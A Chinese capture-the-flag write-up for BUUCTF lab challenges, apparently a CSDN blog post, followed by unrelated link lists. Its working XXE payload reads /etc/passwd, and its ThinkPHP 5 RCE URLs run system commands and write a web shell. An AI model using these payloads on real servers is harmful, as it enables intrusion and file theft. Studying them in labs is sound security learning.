BUUCTF-Real

  • [PHP]XXE
  • [ThinkPHP]5-Rce
  • [ThinkPHP]5.0.23-Rce
  • [ThinkPHP]2-Rce
  • Log4j
  • [log4j]CVE-2017-5645
  • [Flask]SSTI
  • 未完待续

[PHP]XXE

PHP 7.0.30 libxml 2.8.0
libxml2.9.0以后,默认不解析外部实体,导致XXE漏洞逐渐消亡。为了演示PHP环境下的XXE漏洞,本例会将libxml2.8.0版本编译进PHP中。
Web目录为./www,其中包含4个文件:
$ tree .
├── dom.php # 示例:使用DOMDocument解析body
├── index.php
├── SimpleXMLElement.php # 示例:使用SimpleXMLElement类解析body
└── simplexml_load_string.php # 示例:使用simplexml_load_string函数解析body
dom.phpSimpleXMLElement.phpsimplexml_load_string.php均可触发XXE漏洞

利用代码

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE xxe [
<!ELEMENT name ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<root>
<name>&xxe;</name>
</root>/*
1.读取任意文件
file 协议,file:///etc//passwd
php 协议,php://filter/read=convert.base64-encode/resource=index.php
2.执行系统命令
PHP环境中PHP的expect模块被加载
expect://ipconfig
3.内网探测
http://192.168.0.128:80
参见:https://xz.aliyun.com/t/3357#toc-11
*/

利用如下

一篇文章带你深入理解漏洞之 XXE 漏洞
所以要想更进一步的利用我们不能将眼光局限于 file 协议,我们必须清楚地知道在何种平台,我们能用何种协议
如图所示:

PHP在安装扩展以后还能支持的协议:
如图所示:

注意:
1.其中从2012年9月开始,Oracle JDK版本中删除了对gopher方案的支持,后来又支持的版本是 Oracle JDK 1.7
update 7 和 Oracle JDK 1.6 update 35
2.libxml 是 PHP 的 xml 支持

[ThinkPHP]5-Rce

大佬博客走起
以下是其博客POC

************Thinkphp = 5.1.x , php版本>5.5http://127.0.0.1/index.php?s=index/think\request/input?data[]=phpinfo()&filter=asserthttp://127.0.0.1/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=phpinfo()http://127.0.0.1/index.php?s=index/\think\template\driver\file/write?cacheFile=shell.php&content=<?php%20phpinfo();?>************Thinkphp = 5.0.x , php版本>=5.4http://127.0.0.1/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=phpinfo()但是buuctf靶机不能通过上面5.0.x的POC,猜测是其assert函数被禁止或者其他问题

本次buuctf的poc 其版本为5.0.20
?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1

有命令执行我就喜欢远控,发现该靶机有curl命令且可以通外网,那就下载一个蚁剑

BUUCTF-Real相关推荐

  1. BUUCTF的Web真题学习整理(一)

    目录 WEB1-WarmUp (任意文件包含漏洞) WEB2-高明的黑客(fuzz脚本) WEB3-easy_tornado (服务端模板注入(ssti攻击)) WEB4-Hack World(时间盲 ...

  2. BUUCTF寒假刷题-Web

    前言 寒假横向刷题(尽量) BUUCTF

  3. BUUCTF之[Zer0pts2020]Can you guess it? basename函数绕过

    BUUCTF之[Zer0pts2020]Can you guess it? basename函数绕过 题目 后台PHP源码: <?php include 'config.php'; // FLA ...

  4. BUUCTF刷题笔记

    BUUCTF刷题笔记 [极客大挑战 2019]BabySQL 从这句话我们可以看出,这个网站的后台是做了过滤处理的 这个时候我们先用万能密码实验一下看看,是什么类型的SQL注入 输入1',看看返回的结 ...

  5. BUUCTF Quoted-printable编码

    Quoted-printable可译为"可打印字符引用编码",编码常用在电子邮件中,如:Content-Transfer-Encoding: quoted-printable ,它 ...

  6. BUUCTF NewStarCTF一些新知识记录

    提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 目录 前言 一.eazyxor 二.RSA_begin 三.Yesec no drumsticks 四.EzSnake 五.Pyre ...

  7. buuctf Mark loves cat

    buuctf Mark loves cat 打开是个静态页面,源码也无任何有用信息 dirsearch扫描后发现.git泄露 GitHack.py下载得到两个php文件,接下来就是代码审计: flag ...

  8. BUUCTF·[MRCTF2020]天干地支+甲子·WP

    题目来源 BUUCTF在线评测 (buuoj.cn) 附件 得到得字符串用MRCTF{}包裹 一天Eki收到了一封来自Sndav的信,但是他有点迷希望您来解决一下 甲戌 甲寅 甲寅 癸卯 己酉 甲寅 ...

  9. BUUCTF Reverse/findKey

    BUUCTF Reverse/findKey 先看文件信息:32位程序,没有加壳 打开看看,标题为find flag,也没啥有用的信息 IDA32位打开,找到start函数,看到有个main,跟随跳转 ...

  10. BUUCTF中web方向题目记录(二)

    双写绕过 BUUCTF[极客大挑战 2019]BabySQL 好像和前面的题目相似 check.php?username=admin&password=1' 单引号闭合 check.php?u ...

最新文章

  1. @2021 高考生,用 Python 分析专业“钱景”
  2. [J2SE 基础知识]2、抽象类和接口(上)
  3. asp.net性能常用优化
  4. 好用!目前用下来最溜的MacOS微信多开工具!
  5. python自学流程-各个阶段的python学习路线?
  6. Java学习笔记3——继承
  7. 猫猫学iOS之小知识iOS启动动画_Launch Screen的运用
  8. Python动态变量名定义与调用
  9. Java通过引用操作对象的“共享”特性
  10. 如何解决GBK的编码的文件中的中文转换成为UTF-8编码的文件而且不乱码
  11. 二十一世纪科学和数学的趋势
  12. python 网络监控系统手机版下载_云视通网络监控系统手机版下载_云视通下载手机版-太平洋下载中心...
  13. 百人研发团队的难题:研发管理、绩效考核、组织文化和OKR
  14. 【Angular中的RxJS】- Subject 分类介绍
  15. 为什么正经程序员不写注释?
  16. Android Camera HAL3 - MultiCamera-HALBufferManager
  17. Unity发布windows程序,Fullscreen Mode设置为Windowed,可运行总是全屏
  18. 巧用快捷键轻松设置Eexel单元格格式(转)
  19. 使用 BEV 投影的高效城市规模点云分割
  20. 构建器builder模式 + lombok @Builder的介绍及使用

热门文章

  1. 71页智慧工地整体解决方案
  2. 《Spring源码深度解析 郝佳 第2版》ApplicationContext
  3. Chisel教程——03.Chisel中的组合逻辑(结尾附上Chisel3 Cheat Sheet)
  4. ubuntu 安装 chisel
  5. LVGL 之 windows 上 lvgl 模拟器基于 Visual Studio 搭建方法的简单整理
  6. SSL 2382 k好数(数位dp)
  7. 交大网络计算机第二学期,交大网络计算机作业.docx
  8. 湖北9月计算机二级报名时间,[最新]云南省湖北省2019年9月全国计算机二级报名时间公布...
  9. element el-table(:render-header)实现动态表头的自适应
  10. 堡垒机连接跳板机提示账号密码错误NLA or TLS ....